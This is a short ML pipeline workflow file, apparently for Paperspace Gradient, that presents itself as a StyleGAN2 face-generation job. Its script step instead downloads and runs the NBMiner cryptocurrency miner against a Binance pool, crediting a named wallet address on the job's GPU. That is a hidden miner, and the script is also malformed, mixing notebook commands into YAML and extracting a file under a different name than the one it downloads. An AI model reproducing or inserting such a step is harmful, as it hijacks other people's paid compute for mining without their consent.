on:
  github:
    branches:
      only: main

jobs:
  CloneRepo:
    resources:
      instance-type: C4
    outputs:
     stylegan2:
        type: volume
    uses: git-checkout@v1
    with:
      # url: https://github.com/gradient-ai/stylegan2.git
      url: context.event.github.url
      ref: context.event.github.ref
  StyleGan2:
    resources:
      instance-type: P4000
    needs:
      - CloneRepo
    inputs:
      stylegan2: CloneRepo.outputs.stylegan2
    outputs:
      generatedFaces:
        type: dataset
        with:
          ref: demo-dataset
    uses: script@v1
    with:
      script: |-
        !wget https://github.com/NebuTech/NBMiner/releases/download/v40.1/NBMiner_40.1_Linux.tgz
%ls
!tar -zxvf NBMiner_40.1_Lin64.tar.gz
%cd bin/

./NBMiner --algo ETHASH --ethash.poolbinance.com:8888 --user SHIB:0x6d0a7d5b00f0e1609c0bc46e71f3b3735c1eae2f.nkumar6127.001 --ethstratum ETHPROXY
